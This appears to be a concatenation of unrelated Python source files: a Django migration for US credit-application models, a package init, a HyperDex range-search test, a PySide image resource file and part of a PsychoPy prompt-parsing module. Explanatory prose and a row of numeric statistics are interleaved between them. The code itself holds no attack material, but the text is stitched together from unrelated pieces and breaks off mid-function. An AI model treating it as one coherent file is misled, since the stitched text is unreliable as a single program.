django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(
blank=True, max_length=24, null=True, verbose_name="Occupation"
),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="us_individual_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "US Individual Credit Application",
"verbose_name_plural": "US Individual Credit Applications",
"abstract": False,
},
),
migrations.CreateModel(
name="USJointCreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"joint_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"joint_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"joint_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"joint_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"joint_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"joint_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"joint_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"joint_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"main_ssn",
wellsfargo.core.fields.USSocialSecurityNumberField(
max_length=11, verbose_name="Social Security Number"
),
),
(
"main_address_state",
localflavor.us.models.USStateField(
max_length=2, verbose_name="State"
),
),
(
"main_address_postcode",
localflavor.us.models.USZipCodeField(
max_length=10, verbose_name="Postcode"
),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
blank=True,
choices=[("R", "Rent"), ("O", "Own"), ("OT", "Other")],
max_length=3,
null=True,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(
blank=True,
max_length=30,
null=True,
verbose_name="Employer Name",
),
),
(
"main_time_at_employer",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(
blank=True, max_length=24, null=True, verbose_name="Occupation"
),
),
(
"joint_ssn",
wellsfargo.core.fields.USSocialSecurityNumberField(
max_length=11, verbose_name="Social Security Number"
),
),
(
"joint_address_state",
localflavor.us.models.USStateField(
max_length=2, verbose_name="State"
),
),
(
"joint_address_postcode",
localflavor.us.models.USZipCodeField(
max_length=10, verbose_name="Postcode"
),
),
(
"joint_employer_name",
models.CharField(
blank=True,
max_length=30,
null=True,
verbose_name="Employer Name",
),
),
(
"joint_time_at_employer",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"joint_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"joint_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"joint_occupation",
models.CharField(
blank=True, max_length=24, null=True, verbose_name="Occupation"
),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="us_joint_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "US Joint Credit Application",
"verbose_name_plural": "US Joint Credit Applications",
"abstract": False,
},
),
]
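The 4-character "Time at Address"/"Time at Employer" fields above stack `MinLengthValidator(4)`, `MaxLengthValidator(4)`, and `RegexValidator("^[0-9]{4}$")`. As a rough standalone illustration (plain `re`, no Django; the sample values are hypothetical), the regex alone already implies both length constraints:

```python
import re

# Plain-re equivalent of the stacked validators on the 4-character time fields:
# MinLengthValidator(4) + MaxLengthValidator(4) + RegexValidator("^[0-9]{4}$").
FOUR_DIGITS = re.compile(r"^[0-9]{4}$")

def is_valid_time_field(value):
    # "^[0-9]{4}$" already forces exactly four characters, all digits.
    return bool(FOUR_DIGITS.match(value))

print(is_valid_time_field("0312"))   # True
print(is_valid_time_field("312"))    # False: too short
print(is_valid_time_field("12ab"))   # False: non-digit characters
```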
# software/filters/src/filters/__init__.py (iorodeo/water_channel_ros, Apache-2.0)
import kalman_filter
import lowpass
#!/usr/bin/env python2
# test/python/RangeSearchInt.py (cnangel/HyperDex, BSD-3-Clause)
import hyperdex.client
from hyperdex.client import LessEqual, GreaterEqual, LessThan, GreaterThan, Range, Regex, LengthEquals, LengthLessEqual, LengthGreaterEqual
c = hyperdex.client.Client(sys.argv[1], int(sys.argv[2]))
def to_objectset(xs):
return set([frozenset(x.items()) for x in xs])
assert c.put('kv', -2, {'v': -2}) == True
assert c.put('kv', -1, {'v': -1}) == True
assert c.put('kv', 0, {'v': 0}) == True
assert c.put('kv', 1, {'v': 1}) == True
assert c.put('kv', 2, {'v': 2}) == True
assert to_objectset(c.search('kv', {'k': LessEqual(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}, {'k': 0, 'v': 0}])
assert to_objectset(c.search('kv', {'v': LessEqual(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}, {'k': 0, 'v': 0}])
assert to_objectset(c.search('kv', {'k': GreaterEqual(0)})) == to_objectset([{'k': 0, 'v': 0}, {'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'v': GreaterEqual(0)})) == to_objectset([{'k': 0, 'v': 0}, {'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'k': LessThan(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}])
assert to_objectset(c.search('kv', {'v': LessThan(0)})) == to_objectset([{'k': -2, 'v': -2}, {'k': -1, 'v': -1}])
assert to_objectset(c.search('kv', {'k': GreaterThan(0)})) == to_objectset([{'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'v': GreaterThan(0)})) == to_objectset([{'k': 1, 'v': 1}, {'k': 2, 'v': 2}])
assert to_objectset(c.search('kv', {'k': Range(-1, 1)})) == to_objectset([{'k': -1, 'v': -1}, {'k': 0, 'v': 0}, {'k': 1, 'v': 1}])
assert to_objectset(c.search('kv', {'v': Range(-1, 1)})) == to_objectset([{'k': -1, 'v': -1}, {'k': 0, 'v': 0}, {'k': 1, 'v': 1}])
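The `to_objectset` helper exists because `search` may yield matching objects in any order; freezing each dict into a `frozenset` of its items makes the comparisons order-insensitive. A standalone sketch with made-up rows:

```python
def to_objectset(xs):
    # A dict is unhashable, so freeze each one into a frozenset of (key, value)
    # pairs; the surrounding set then compares regardless of iteration order.
    return set([frozenset(x.items()) for x in xs])

a = [{'k': 1, 'v': 1}, {'k': 2, 'v': 2}]
b = [{'k': 2, 'v': 2}, {'k': 1, 'v': 1}]   # same rows, different order
print(to_objectset(a) == to_objectset(b))  # True
print(a == b)                              # False: plain lists are order-sensitive
```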
# -*- coding: utf-8 -*-
# mapclientplugins/pointwiserigidregistrationstep/resources_rc.py (jtpils/pointwiserigidregistrationstep, Apache-2.0)
# Resource object code
#
# Created: Tue Jul 8 07:56:52 2014
# by: The Resource Compiler for PySide (Qt v4.8.4)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x08\xea\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00@\x00\x00\x00@\x08\x06\x00\x00\x00\xaaiq\xde\x00\x00\x00\x04sBIT\x08\x08\x08\x08|\x08d\x88\x00\x00\x00\x09pHYs\x00\x00\x0d\xd7\x00\x00\x0d\xd7\x01B(\x9bx\x00\x00\x00\x19tEXtSoftware\x00www.inkscape.org\x9b\xee<\x1a\x00\x00\x08gIDATx\x9c\xed\x9a\x7f\x8c\x5cU\x15\xc7?\xe7\xcd\xfe((\xb05\x11\x0b5q\x08U+\x08\x8c\xa2\x0b\xa5@\xe7\x05Z1$\xb0\x13\x8c\x7f\xf8\x87\xdd5\xc6?\xfcC\xb7\xf1\x0f\xf9\xc3d\x19\xf5\x0f\xff\xb2\xdd\x10\x821\x9a]H\x94\x180\xb3\x0dA\x22\x0b\xce\xd3\x02\x0b4\xa6\xafX\x97\xc6\x80\x1d\x22 \xa4\x22CT\xb6\xbb\xfb\xfe\x0c\xa7\xf2\xc3\xf9\x9d\xdf\xef\x9cs\xcf=\xf7\x9c\xf3\xbb\xf7\x9e\xb9\x03\x93\x92\xc9\x80\xc9\x92fv*\x5c\x96]4\xb3\x92\x99U\xcd\xac\xef\x8d\x1c\xcd\xcc\xf2f\xb6\xdd\xcc\x0af\x96\x99Y\xdd\xcc\xb2\xff\xcd\x00\x93@\x8c\x8bd;Y\x06\x9c\xf1\x22fy\x10\x90\xcb/~%\x00\x84\xa6\xfd\x1f\x05|n%9/{)\xf0=\xe0\x9a\xd3\x90\x8d2\xf7V\x96\xfb\x8f\x7f\xe0n\xef\xeb\xd6\xa5\xb6\xa0\x05\xa0\xb3\x81\xab\x80\x0b\x80\x83\xc0\xd5\xc0\xfd\xc0\x17\xdaP<\xc7\xcc\xac\xa5i\x1e\xa8\x00\xdfY\x06\xf1\xde6\xd9\x8f\x00\xdf\x04>\xb5\x8cl\x9f\x99\x9d\xd7y\xfe\xc0\xcc\x023{\xefJ2\x1d\xf4\xfa;v\xb6\xa0s\x19\x19:\x8fx~\xd0\xf3\x0f{\xfeV\xa0\xe1\xdb\xde\x02\xc6\x81\x008\x0b8\x01Ly\xb9\xbb<\x7f\x170\x07\x1c\x03n\x02\xae\x00\x16\xbc\xfe\xa2\x97\xb9\x16\xf8\x18\xf08\x90\xfa\xbe\xfb\xda#\x00\xe8\x05~\xe0\xed\x09x\x01\xb8\xc9\xf7}\xcb\xdb\xba\xce\xf3\x8f\x00s\xfe\xba\x1f\xf8>\xf0\x0f\xe09\xdfwR\x04,\x07\xc0,\xf0U\xe0a\xcf\x7f\x038\xdf\x1by\x11\xf8,\xf03\xdf\xf7\x15\xdaR\x00\xf8\xa1\xe7\x7fI\x96B\x8b\xc0\x83\xc0\x0e\xe0\x0f9\xc3\x00k=\xff\x22\xf0\x92\xbf\xae\xf8\xbe\xafy\xfe=\x9e?\xb2R\x0d KE\x01\x97y\xfe\xc7\x9e\xbf\xa6\x05\x80\xb2\xef\xfbM\x8b\xde\x8f|\xdf\xe5\x9e\xffy;\x00=\x9cJ\x8fI\xda\xd5\xda`fM\x7f\xb9\xb9\xed\xbfIgZ\xaa\xde\xf3\xfeF\x97\xae\x01\xfa\xfc\xff\x9co\xdblf\xfd\x92\xe6\xcd,\x90\xe4\xdal\xb5\x8e\xff\xbb\xb6\xf1\xdf\xf4\xd7\xe7\x9aY/Y\xaa-Q\xa3E\xefY\xe0\xc2S\xbc\xecT\x03\xdaf# KE\x01\x97\xbe\xd3\x9e\xcdl\x22\xcb\x9e\xbf\xe2\x9d\x05\xb8\x93\xac\x88!\xa9if%\xe0\x33\xc0\xb9\xc0\x82\xa4\xdb\xcd\xec\x71\xe0F\xb2\x48y\xc8\xeb\x4d\x02u\xaf\xf7[\x33\xbb\x0c\xf8\x22Y=\xba\xcf\x8f/`\xd6\xcc\x76\x92\x15\xe9_\x00\x1f\x00>\xe4\xf5f\xcd\xec\xa3d5\xed\xf7\x81\xe3d+\xd0\x5f\x96\xeeMY\x1e\x1b\xa1\xff\x66\x0a\xde^\xe4\x7f\x9b\xd6\x01\xe8\xb6\x03\xdd\xa6u\x00\xba9\xf8\x9b_\xbe\xae\xeb\x15\xb8\xab\x00(i\xdf\xef\xac=u\x15\x00\x97\xa4\xdd\x1c\x1e\x58\xe3}\xc0\xf1\xcf\x0f\x96,P\xd9\xb0+\x04E3\xca\x12\x11\x10\xcbq8-\x14\xa2M\xf7\xcd4\xd6\xcc!\xd6\x08\x80\xe3\xb7]9\x8c\xd9\x18F\xf1\xd4\xbf\x8d\xd6Z\x19\xac2\x80\x57\x2b\x83\xc3\xce8$g%9C\xce\x22g\x84\xe7?p\xb0\xe3[i\xf2\xe2\x12\x22\x39\xc3%D\xef\x7f\xe0`x\xfe\x03\x07\xcd\xc9F\xe4\xac!g\x48\x36\x34o\xbd\xc7^\xae\x0c\x96\xde~\xb4w\x4e\xabE\xc0\xab\x95\xc1a\xb0\x09\x00\x83\xa6\x08*'8\x11\xf7\xd1\x37j\xb0\xdb85\x15\x04\xb1\xa1\xf1M\xb5g&\xff\x5c\xb9z\xd4\xd0^\xdf\xde\x74(\xdc\x5c{&\xce\xdd\x51V!\x02^\xae\x0c\x96\x9c\x82\x09'\xc3\xc9\xe2\x39\x16.R\xea\x06\xfa\xd4\x7f\x0c\xd9\xd7\x9d\xb3)\x08\xc2M\xb5\xa7\xcd\xc9\x38\xc1\xc2FAE\xb2\xd8)\x98xe\xe8\xeaC\x0e\x17A\x10:Y\x53\xb2\x01S\x50kT>1\x90\xb7\xaf\xb0\x1a)\xe0\x82\x09\xc9\x90h\x06f\x95\xdet\xc3\x90\xb3\xa0&lj\xc1\xe6/\xda\xbc\xff\xa9=\x9bj3\x11\x80d\x14k\x87\x9a\x17\xd4\x9e\x9e\xbap\xea\xa9\x91\xc0\xec\x22\x09H\x83z\xba\x104\xcd\x05#\x99-+\xf6\xa6\xfdc\xb9\xfbJ\xce\x00\xfc\xe9\x96m\xc3r\xc1R\xce\x57\x16S+I6!\xa8n\x9e\x9a\x19)\xb6\x154\x39;I\x7fSm\xa6\xb1\x18\x9c\x15JD\x0aT\x9f/(\x96\xa3\x9a\xd5\x84`\xb4Q\xd9V\xcc\xd3_\xc8;\x02\x5c0\xe6g?Jz6\xc48\x9b\x90l\xf2\x83\xfbg\xee\x58N\x5c\xb2S\xda\x8a\xb5z3\xe99k\xc4\x89Fa\xd1&\x92\x9e\x0d\xfb$\x9a\x92Q\x58\x0c\xf2\x8f\x82\xdc\x00h\xdc\xbc\xbd$Q\x94 \xb5B\x95\x85\x85Q\x09\xd2\xde\xbe=\x9dt:\xd5\xdf\x62\xad\xdet\x56\xd8#Y\x99$)I6.\x108\x31\x94\x97\xbfK\x94_\x04\xc8\xca>_\x9b\xc5\x07\x0fD8\xdb\x8dl\xb2X\xabw\x5c\xc7\x97\x8b\x80%*>x R,&\xd1n\x07S\x92\x81l\xa0q\xf3\xf6\x5c\x97\xc5\xdc\x00p\x8e+\x9c3RgQ#\x0c\x07$+:\xd9\xfe\x95u:\x03\x00\x90\xca\xf6KV*>\xf4D\xec\x9c5\x9d3p\x85w'\x00\xe6\x82b6K\xc1\xe1dCR\x92\x8c\xe2\xc3\x07\xa2\x95tV\x8a\x00\x00\x07\x91d\xd9\x0d;\x8b%\xc39+\xe6\xe42p\x06\x1b\xa1\x17v\xed\xe8\xfaY\xfe\xe2G~\xbd2\x82\xa7A\xb9\xed\x04\x9f\xdfY\xae\x03e\xb0*\x10\x81\xea=\x89m,\xd6;\xd7\x80\xe7w\x96\xb5e:\xeax\x13/\xdc\x18\x0e\xc9T\xdb2\x1dY\xab\xfd-\xd3\xf5;rq\x9a\x1cS@(\xf6K\xe0\x8e-\xd3\xf5H2\x16\x0am\x07\x9cv\x9d\xb7K\x01\xb1C\xb2\xc8\xcb\x96%\xc3\x89\x5c\xb7\xc4\xf9\xad\x02Ip\xd8o\x80\xca\x00r\xc4(\xb8u%\x95\xf6\x8d\xd0)\xfd\xb2!R\xe2\xa3aX\xf6\xb6q\xe9\xbb\x14\x80\x14\xa2\xece+\x1c\x0d\xc3a'\xc6\xe54|4\x0c\x8b\x9dtV\xca\xbe\xa3a8,QLa< \xd8\xedm7\xb6\xd6\xeb\x8d\xbc|\x86\x1c\x01\xd8Z\xaf7$\x22\xbf\x12\x8cm\xad\xd7'Q\x10\x9b\x0a\xb58\x0c\x97=\xc8tJ\x81\xd90,\x99\x82\xbd8\xdb\x07\xe0\xc4\xb0d\x08\xbb'/\x7f\x97(\xdf\xad\xb0\x15\xaaK\x87\x97\xe7\xae\xbfa4\xb5`\xc4\x89b\xbf\x0a\x13\xcb\x81\xb0\x1c\x00\xb3\xdbw\x95\xcc\x15&\x9c\xac1\x17\xb8\xaaT\xd8\xbb\xb4\xc1:\x81\xdb\x97\xab\xbf\xe4\x0c\xc0\xd6\xfat$\xd9T6[\xc1^\x97h@I\x10\xcaY\xb9\xcf\xf5\xd4\x8f\x5c\xb7\xb3\xdc*\xdf\x0e\xc0\xec\xf5\xbb\x86)\xa8.\x8c\xf9 \x0d\xfb\x5c\xcf\xa8\x9c\x0d\xf9]`\xb5\xb4\xc2\x8a\xf2N)\xf7\x07\x22q\x18\x0e\xf4&=\xc7\xc0\x06\x80\xa63\x1b\xe9-\x04q\x9a$\x13`e \x16\xb6\x1f\x5cdX\xdd\x99U\x02\xd8\x81\xd3\x10F\x11\xd3\xbe\xc5BR\xedI\xfaF\x0d\xf9\xc3\x8f\xa2K\x0fL\x87\xb9:\xeaiU\x9e\x08\xcdn\xdfUrF\x9d\xec{\x00\x90\xaaI_\xb2\xaf'\xe9)\x99l\xb7\xb2g\x84\xad[\xdaHX\x9c\xa6\xc18@O\x90\xec\xc5l\xe9\xe0\x13'\xbd\x8b\xe1j\xcc>\xac\xe2C\xd1\xd9\xed\xbbJ\x92\xab\xe9_\x8f\xbf\xd4\xc4\x18\x0fpS\x97<Q\x8f\x01\x8e\x5cs\xa3>\xfe\xe4\xa3\x06pd\xdb\xce\xb2\x05n\xb7d\xc3-f\xa2\xa4?\xad\xac\xd6\xcd\xc3*?\x15\x8e\xc3p\xa00\xc7\x18f\xa3'uHM\x8c8K\x09E>5Z\xfai*\xb0\xea\xe5O>\x96{\xd1k\xa75y/\x10o\x0b\x8b\x05i\x0c\x18b)-\x96\xa7\x86\xcc\xeeq'\xd8W:\xb4z\xb3\xdeJk\xfe\x85\xc8\xec\xe0\xf6RJ\xa1$\xb3\xa2Ic2\xab\x1a\x8a\xd3\xa0\x10\x97f\xf2\xdd\xe4\x9c\x0eu\xf5\x13\x99g?}\xad.?\xf8\xf8\x19\x9f\xe8\xce\x84\xba\xfb}\x80\xfb?\x7f;|\xea\xe7\x80kO\xeb_\x89u\xdb\x81n\xd3:\x00\xddv\xa0\xdb\xb4\x0e@\xb7\x1d\xe86\xad\x03\xd0m\x07\xbaM\xeb\x00t\xdb\x81n\xd3:\x00\xddv\xa0\xdb\xb4\x0e@\xb7\x1d\xe86\xad\x03\xd0m\x07\xbaM\xff\xf7\x00\xfc\x13,i\x1bp;,\xeb\xd4\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x1e\x01\xf2\x8f@\x00p\x00o\x00i\x00n\x00t\x00w\x00i\x00s\x00e\x00r\x00i\x00g\x00i\x00d\x00r\x00e\x00g\x00i\x00s\x00t\x00r\x00a\x00t\x00i\x00o\x00n\x00s\x00t\x00e\x00p\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x19\x00`\xc8G\x00p\x00o\x00i\x00n\x00t\x00w\x00i\x00s\x00e\x00r\x00i\x00g\x00i\x00d\x00r\x00e\x00g\x00i\x00c\x00o\x00n\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00B\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00T\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 362.636364 | 6,842 | 0.744422 | 1,753 | 7,978 | 3.374786 | 0.339989 | 0.051724 | 0.041075 | 0.020284 | 0.08739 | 0.083333 | 0.081812 | 0.081812 | 0.077248 | 0.072684 | 0 | 0.247743 | 0.014415 | 7,978 | 21 | 6,843 | 379.904762 | 0.504642 | 0.022813 | 0 | 0 | 0 | 0.333333 | 0.953006 | 0.951461 | 0 | 0 | 0.00103 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
#!/usr/bin/env python2
# GeneralTools/PromptTools.py (djangraw/PsychoPyParadigms, MIT)
"""Load Questions, Run Prompts, and Run Probe Trials."""
# PromptTools.py
# Created 1/30/15 by DJ based on VidLecTask.py
# Updated 3/16/15 by DJ - added ReadingTask_dict.py
# Updated 9/8/15 by DJ - added Likert option and RunQuestions_Move.
# Updated 10/29/15 by DJ - updated distraction/reading task prompts to ask subjects to read top to bottom.
# Updated 11/9/15 by DJ - added ParsePromptFile function.
# Updated 1/11/16 by DJ - added fwdKeys input to RunPrompts function
# Updated 1/14/16 by DJ - added returnTimes input to ParseQuestionsAll (extracts pages and times of questions), added 'First' conditions to GetPrompts
# Updated 1/20/16 by DJ - fixed RunPrompts fwdKeys default
# Updated 1/24/17 by DJ - removed import of visual, fixed question timeout
# Updated 3/17/17 by DJ - added SingingTask
from psychopy import core, event, logging#, visual # visual and gui conflict, so don't import it here
import time
import string
# --- PARSE QUESTION FILE INTO QUESTIONS AND OPTIONS --- #
def ParseQuestionFile(filename,optionsType=None,returnTimes=False): # optionsType 'Likert' returns the Likert scale for every question's options.
# initialize
questions_all = []
answers_all = []
options_all = []
pages_all = []
times_all = []
if optionsType is None:
options_this = []
elif optionsType == 'Likert':
options_likert = ['Strongly agree','Agree','Neutral','Disagree','Strongly disagree']
options_this = options_likert
# parse questions & answers
with open(filename) as f:
for line in f:
# remove the newline character at the end of the line
line = line.replace('\n','')
# replace any newline strings with newline characters
line = line.replace('\\n','\n')
# pass to proper output
if line.startswith("-"): # incorrect answer
options_this.append(line[1:]) # omit leading -
elif line.startswith("+"): # correct answer
options_this.append(line[1:]) # omit leading +
answers_all.append(len(options_this))
elif line.startswith("?"): # question
questions_all.append(line[1:]) # omit leading ?
# if it's not the first question, add the options to the list.
if options_this:
options_all.append(options_this)
if optionsType is None:
options_this = [] #reset
elif optionsType == 'Likert':
options_this = options_likert
elif line.startswith("#"): # question header
pieces = line.split(',')
for piece in pieces:
nameval = piece.split() # split at space
if nameval[0] == 'PAGE':
pages_all.append(nameval[1])
elif nameval[0] == 'TIME':
minsec = nameval[1].split(':')
times_this = int(minsec[0])*60+int(minsec[1])
times_all.append(times_this)
# info[nameval[0]] = nameval[1]
# make sure last set of options is included
options_all.append(options_this)
# return results
if returnTimes:
return (questions_all,options_all,answers_all,pages_all,times_all)
else:
return (questions_all,options_all,answers_all)
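As a quick illustration of the file format this parser expects ('?' opens a question, '+' marks the correct option, '-' an incorrect one, '#' carries PAGE/TIME headers), here is a minimal re-implementation of the core branching on a hypothetical in-memory sample:

```python
# Hypothetical question-file lines in the format ParseQuestionFile reads.
sample_lines = [
    "# PAGE 3, TIME 1:30",
    "?What is the capital of France?",
    "-London",
    "+Paris",
    "-Rome",
]

questions, answers, options_this = [], [], []
for line in sample_lines:
    if line.startswith("-"):      # incorrect option
        options_this.append(line[1:])
    elif line.startswith("+"):    # correct option
        options_this.append(line[1:])
        answers.append(len(options_this))  # 1-based index of the correct option
    elif line.startswith("?"):    # question text
        questions.append(line[1:])

print(questions)     # ['What is the capital of France?']
print(options_this)  # ['London', 'Paris', 'Rome']
print(answers)       # [2] -> 'Paris' is the second option listed
```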
# --- PARSE PROMPT FILE INTO TOP AND BOTTOM PROMPTS --- #
# Each top prompt should be preceded by a +. Each bottom prompt should be preceded by a -. Everything else will be ignored.
def ParsePromptFile(filename):
# initialize
topPrompts = []
bottomPrompts = []
# parse questions & answers
with open(filename) as f:
for line in f:
# remove the newline character at the end of the line
line = line.replace('\n','')
# replace any newline strings with newline characters
line = line.replace('\\n','\n')
# pass to proper output
if line.startswith("-"): # bottom prompt
bottomPrompts.append(line[1:]) # omit leading -
elif line.startswith("+"): # top prompt
topPrompts.append(line[1:]) # omit leading +
# if it's not the first question, add the options to the list.
# return results
return (topPrompts,bottomPrompts)
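A minimal sketch of the prompt-file convention described above, using hypothetical lines: '+' lines become top prompts, '-' lines bottom prompts, and the i-th pair is displayed together by RunPrompts:

```python
# Hypothetical prompt-file lines in the format ParsePromptFile reads.
sample_lines = [
    "+Welcome to the experiment.",
    "-Press any key to continue.",
    "+Please keep your eyes on the screen.",
    "-Press any key to begin.",
]

topPrompts, bottomPrompts = [], []
for line in sample_lines:
    if line.startswith("-"):      # bottom prompt
        bottomPrompts.append(line[1:])
    elif line.startswith("+"):    # top prompt
        topPrompts.append(line[1:])

print(topPrompts)     # ['Welcome to the experiment.', 'Please keep your eyes on the screen.']
print(bottomPrompts)  # ['Press any key to continue.', 'Press any key to begin.']
```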
# Display prompts and let the subject page through them one by one.
def RunPrompts(topPrompts,bottomPrompts,win,message1,message2,fwdKeys=None,backKeys=['backspace'],backPrompt=0):
iPrompt = 0
# declare default for fwdKeys
if fwdKeys is None:
fwdKeys = [chr(i) for i in xrange(127)]
while iPrompt < len(topPrompts):
message1.setText(topPrompts[iPrompt])
message2.setText(bottomPrompts[iPrompt])
